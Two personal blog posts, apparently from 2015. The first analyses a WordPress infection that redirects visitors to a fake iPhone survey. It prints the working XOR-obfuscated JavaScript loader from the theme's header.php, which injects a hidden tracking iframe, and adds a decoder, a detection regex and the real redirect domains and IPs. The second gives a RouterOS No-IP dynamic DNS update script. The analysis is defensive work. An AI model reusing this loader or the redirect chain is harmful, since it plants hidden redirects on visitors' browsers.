Thursday 10 September 2015

A new WordPress infection: var a="'1Aqapkrv'02v...

A few days ago I came across a malware that attacked a WordPress-based website of a friend of mine.
The symptom of the infection is clear: the first time you visit the home page you get redirected to a fake online survey that promises you an iPhone. You can reach this page only once a day from the same IP address.
Here is a screenshot of the fake survey. Unidata is my ISP.
After analysing the home page I found a hidden iframe that I did not remember ever seeing:
<iframe height="0" src="c11n4.i.teaserguide.com/snitch?default_keyword=Home%20-%20Sito%&referrer=&se_referrer=&source=www.thesite.com" width="0"></iframe>
The domain teaserguide.com, registered by some Russian people, collects the name of the site and its address, probably to track the infection. But who is writing this iframe?
At a first look through the code, I found the malicious script inside the header.php of my theme (Avada child).

The script is obfuscated (each character is XORed with 2 and then URL-escaped) and it looks like this:
var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);
Using a JavaScript sandbox I was able to run the script and verify that it composes exactly the iframe found in the home page.
OK, infection found and removed, but I wanted to discover more, so I dug deeper with Wireshark.
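Instead of running the loader in a sandbox, the same payload can be decoded statically. The following is an added example (my code, not from the original post): it repeats the loader's two decode steps (charCode ^ 2, then %XX unescape) but returns the clear text instead of passing it to document.write(), splices the split-up iframe src literals back together, and gives a grep-style signature for this kind of injector. The OBFUSCATED constant is the string from the infected header.php above.

```javascript
// Added example (not code from the original post): static decoder for the
// XOR-obfuscated loader injected into header.php. Nothing here is executed as
// script; the payload is only transformed into readable text.

// The obfuscated string exactly as it appears in the infected header.php.
const OBFUSCATED = "'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";

// Step 1: undo the XOR; the loader computes String.fromCharCode(c ^ 2) per char.
function xorDecode(s, key) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    out += String.fromCharCode(s.charCodeAt(i) ^ key);
  }
  return out;
}

// Step 2: the XOR output is still %XX-escaped (the loader calls unescape()).
// Only the %XX form occurs in this payload, so a small replacer is enough.
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function deobfuscate(s, key = 2) {
  return percentDecode(xorDecode(s, key));
}

// Step 3: the clear text builds iframe.src from many tiny string literals joined
// with "+" (which defeats a naive grep for the domain). Splice the literals back
// together; non-literal tokens (JS variables) are kept as {name}.
function rebuildIframeSrc(script) {
  const m = /iframe\.src\s*=\s*([^;]*);/.exec(script);
  if (!m) return null;
  return m[1].split("+").map((t) => t.trim())
    .map((t) => (/^"(.*)"$/.test(t) ? t.slice(1, -1) : "{" + t + "}"))
    .join("");
}

// Defender-side signature for this injector family: a fromCharCode/charCodeAt
// XOR loop whose result reaches document.write within a short distance.
const XOR_WRITER_RE = /String\.fromCharCode\([^)]*charCodeAt\([^)]*\)\s*\^\s*\d+\)[\s\S]{0,200}document\.write/;
function looksLikeXorWriter(src) {
  return XOR_WRITER_RE.test(src);
}

console.log(deobfuscate(OBFUSCATED));
console.log("iframe src:", rebuildIframeSrc(deobfuscate(OBFUSCATED)));
```

The rebuilt src matches the hidden iframe found in the home page, with the three runtime values (page title, referrer, host) shown as placeholders.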

What I found surprised me. The redirection actually passes through several sites and services, listed here:

Step 1:
 46.229.167.130    HTTP    606    GET /xzAx3?sid1=Test_Source1&sid2=c11n4.i.teaserguide.com&sid3=www.thesite.com
If we query that IP without supplying exactly the parameters of the GET, we get back a page consisting of a single sentence: no found offer.
This suggests that the service returns different pages for different sites/requests.
 
Step 2:
HTTP    389    HTTP/1.1 302 Found  (text/html)[Malformed Packet]
bdvice.net/hs/?r=http://djsrp.com/c/41962/54197/?sid=&trx=60q5yyaxk2
Step 3:
46.229.167.130    HTTP    642    GET /hs/?r=http%3A%2F%2Fdjsrp.com%2Fc%2F41962%2F54197%2F%3Fsid%3D%26trx%3Dzc0ccua00t HTTP/1.1 
Step 4:
54.210.222.29    HTTP    452    GET /c/41962/54197/?sid=&trx=zc0ccua00t HTTP/1.1 
Step 5:
id06t.cleardefendlinked.com/?&s1=54197&s2=501595675-222617964-2065267263
This step is interesting because the domain id06t.cleardefendlinked.com is hosted on Amazon's cloud platform, behind an Elastic Load Balancer: wsf11-1661233086.us-east-1.elb.amazonaws.com
Here we find a service that offers a redirect tool or, as in our case, a "Rotator Tool", which rotates and splits your link across different URLs.
Our destination link will be:
Step 6:
  bMnzz.exclusiverewards.daqa.info/?sov=63633901&hid=hnljjpplnlpxp&redid=6958&gsid=68&id=XNSX.54197%3A%3A501595675%7C%7C222617964%7C%7C2065267263-r6958-t68
This is the link with the fake online survey. The address differs from the one in the image at the top of my post because this one was reached at another time, from a different PC.

Analyzing the traffic coming from this final site, we discover the repository of the code used to compose the fake online survey:
192.155.85.199    HTTP    312    GET /templates/_common/_templates/isp_survey_noselect_IT/css/style.css
/templates/_common/js/date/returnDate.it.js
/templates/_common/_templates/isp_survey_noselect_IT/js/script.js
/templates/_common/_templates/isp_survey_noselect_IT/images/logo_red.png
The suffix IT suggested that a localized version of the survey exists, and in fact you can also request the styles and scripts for other languages by changing the suffix.

Other sites connected to the redirection service are:

jvvzz.allnrgames.pocketmarble.science/?sov=63633901&hid=hxlpjrjhjhjrlpxp&redid=6958&gsid=68&id=XNSX.-r6958-t68
it.reimageplus.com/lp/slm/index.php?tracking=YTZ&banner=&adgroup=&ads_name=direct&keyword=direct&context=Co10k75n3p

You can try different queries against the Amazon services yourself.
Of course this analysis is a partial one, because I'm not a strong security researcher and the security world is only a hobby for me, like web programming. (Sorry, but I prefer embedded and desktop programming) :)

Anyway, I want to close this story by also reporting the cookie that this site sets:
Cookie: log_63633901=1; noshid=hvpzlxjlhnlpxp; id=XNSX.54197%3A%3A501595675%7C%7C222617964%7C%7C2065267263-r6958-t68; SITE_ID=63633901; sov=63633901; mov=nr.ytsurvey.mini; redid=6958; gsid=68; URI=sov%3D63633901%26hid%3Dhnljjpplnlpxp%26redid%3D6958%26gsid%3D68%26id%3DXNSX.54197%253A%253A501595675%257C%257C222617964%257C%257C2065267263-r6958-t68; templateid=26191; path=isp_survey_noselect_IT; version=366255;

If I find anything new I'll update the post, hoping this will be useful for blocking those sites and removing these infections.


Tuesday 8 September 2015

RouterOS: update No-IP dynamic public address

This script shows a way to update the No-IP.com service with the public IP address of a RouterOS board installed inside a LAN, where the box is not directly exposed to the internet.
This script is based on several resources that I combined to reach my goal.

Change the values of the first three variables to match your configuration.
# No-IP automatic Dynamic DNS update

#--------------- Change Values in this section to match your setup ------------------

# No-IP User account info
:local noipuser "no-ipUsername"
:local noippass "password"

# Set the hostname or label of network to be updated.
# Hostnames with spaces are unsupported. Replace the value in the quotations below with your host names.
# To specify multiple hosts, separate them with commas.
:local noiphost "myhost.ddns.net"


#------------------------------------------------------------------------------------
# No more changes needed

# Learn the current public address from an external "what is my IP" service,
# then read it back from the downloaded file (RouterOS commands need the ":" prefix).
/tool fetch url="http://myip.dnsomatic.com/" mode=http dst-path=mypublicip.txt
:local ip [/file get mypublicip.txt contents]
:put $ip

# The update URL. Note the "\3F" is hex for question mark (?). Required since ? is a special character in commands.
# Note: with a plain http:// URL the No-IP username and password travel in cleartext over the internet.
:local url "http://dynupdate.no-ip.com/nic/update\3Fmyip=$ip"
:local noiphostarray
:set noiphostarray [:toarray $noiphost]
:foreach host in=$noiphostarray do={
   :log info "No-IP: Sending update for $host"
   /tool fetch url=($url . "&hostname=$host") user=$noipuser password=$noippass mode=http dst-path=("no-ip_ddns_update-" . $host . ".txt")
   :log info "No-IP: Host $host updated on No-IP with IP $ip"
}
 
Credits:
c0d3rSh3ll from Mikrotik forum.
Mikrotik Wiki page